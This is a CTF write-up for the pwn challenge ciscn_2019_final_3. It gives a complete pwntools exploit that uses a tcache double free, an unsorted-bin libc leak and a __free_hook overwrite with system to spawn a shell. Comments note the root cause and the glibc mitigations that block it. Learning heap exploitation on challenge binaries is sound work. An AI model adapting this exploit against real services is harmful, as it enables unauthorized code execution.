ciscn_2019_final_3

tcache机制的利用，通过unsorted泄露进而将堆空间开辟到libc中，写__free_hook拿到shell…
exp

from pwn import *

# pwntools log level: 'debug' echoes every byte sent to / received from the
# target. Useful while developing the script, very noisy once it works.
context.log_level = 'debug'

def pause_debug():
    """Log the PID(s) of the target process and block until the user resumes.

    Intended for attaching a debugger to the live process mid-run; it has no
    return value and no effect on the protocol state.
    """
    pids = proc.pidof(p)
    log.info(pids)
    pause()

def add(idx, size, content):
    """Drive menu choice 1 ("add"): allocate `size` bytes in slot `idx`.

    The three numeric answers are sent line-terminated after their prompts;
    `content` is sent raw (no newline) after the 'something' prompt, so it
    must already be bytes of the intended length.
    """
    for prompt, answer in (('choice >', 1), ('index', idx), ('size', size)):
        p.sendlineafter(prompt, str(answer))
    p.sendafter('something', content)

def remove(idx):
    """Drive menu choice 2 ("remove"): free the chunk stored in slot `idx`.

    Calling this twice with the same index is how the exploit below triggers
    the double free; the helper itself does no bookkeeping.
    """
    p.sendlineafter('choice >', '2')
    p.sendlineafter('index', str(idx))


# Root cause exercised below: the program keeps a slot's pointer after freeing
# it, so the same index can be freed twice (use-after-free / double free).
# Mitigations on the defender side: clear the slot on free; glibc 2.29+ tcache
# aborts on this double free via its 'key' field check; glibc 2.34 removed
# __free_hook altogether, so the final stage has no target there.
#
# --- target setup -----------------------------------------------------------
# Local run of the challenge binary with its bundled glibc 2.27; the remote
# line is kept commented out for switching back to the live instance.
proc_name = './ciscn_final_3'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 25285)
elf = ELF(proc_name)
libc = ELF('./libc-2.27.so')
# --- stage 1: heap address leak ---------------------------------------------
# After an allocation the program prints the chunk's address after 'gift :';
# 14 characters are read and parsed as hex.  0x11e70 is this build's offset
# of chunk 0 from the heap start.  heap_base is only logged; the later steps
# use chunk0 directly.
add(0, 0x78, b'a') # get heap addr (chunk 0)
p.recvuntil('gift :')
chunk0 = int(p.recv(14), 16)
heap_base = chunk0 - 0x11e70
log.info(hex(heap_base))
# Fill slots 1-10: slot 1 is a 0x18-byte chunk, slots 2-10 are 0x78-byte
# chunks (the same size class as chunk 0).
add(1, 0x18, b'a')
add(2, 0x78, b'a')
add(3, 0x78, b'a')
add(4, 0x78, b'a')
add(5, 0x78, b'a')
add(6, 0x78, b'a')
add(7, 0x78, b'a')
add(8, 0x78, b'a')
add(9, 0x78, b'a')
add(10, 0x78, b'a')

# Double free of slot 10 -- the program evidently does not invalidate the
# slot on free.  With this libc (2.27) tcache does not detect it.
remove(10)
remove(10)

# --- stage 2: fake size header so chunk 0 goes to the unsorted bin -----------
# The first two 0x78 allocations come back from the doubly-freed chunk and
# write chunk0-0x10 into it; presumably the third is then served at
# chunk0-0x10, so p64(0)+p64(0x4a1) replaces chunk 0's size field.  0x4a1
# exceeds tcache's largest size class, which is why freeing chunk 0 below
# lands it in the unsorted bin (author's note).
add(11, 0x78, p64(chunk0 - 0x10))
add(12, 0x78, p64(chunk0 - 0x10))
add(13, 0x78, p64(0) + p64(0x4a1)) # fake_chunk
remove(0)
remove(1) # into unsorted bin
# Re-allocate from the freed chunks.  Slot 14 is used twice; presumably the
# program just overwrites the earlier pointer.
add(14, 0x78, b'a')
add(14, 0x78, b'a')
add(15, 0x18, b'a')

# --- stage 3: libc leak -------------------------------------------------------
# This 0x18 request is carved out of the unsorted chunk and the 'gift'
# address printed for it is a pointer into main_arena (author's comment).
# 0x3ebca0 is that pointer's offset from the libc base in this libc-2.27
# build; it is libc-specific.
add(16, 0x18, b'a') # main_arena
# pause_debug()
p.recvuntil('gift :')
libc_base = int(p.recv(14), 16) - 0x3ebca0
log.info(hex(libc_base))

# --- stage 4: overwrite __free_hook ------------------------------------------
# Same double-free pattern as slot 10, now in the 0x68 size class.
# write __free_hook
add(17, 0x68, b'a')
remove(17)
remove(17)
free_hook_addr = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
# add(18) writes the hook address into the freed chunk; add(19) takes that
# chunk and fills it with "/bin/sh"; add(20) is then served at __free_hook
# and stores system's address there.
add(18, 0x68, p64(free_hook_addr))
add(19, 0x68, b'/bin/sh\x00')
add(20, 0x68, p64(system_addr))
# Freeing slot 19 invokes __free_hook("/bin/sh"), i.e. system("/bin/sh").
remove(19)
p.interactive()

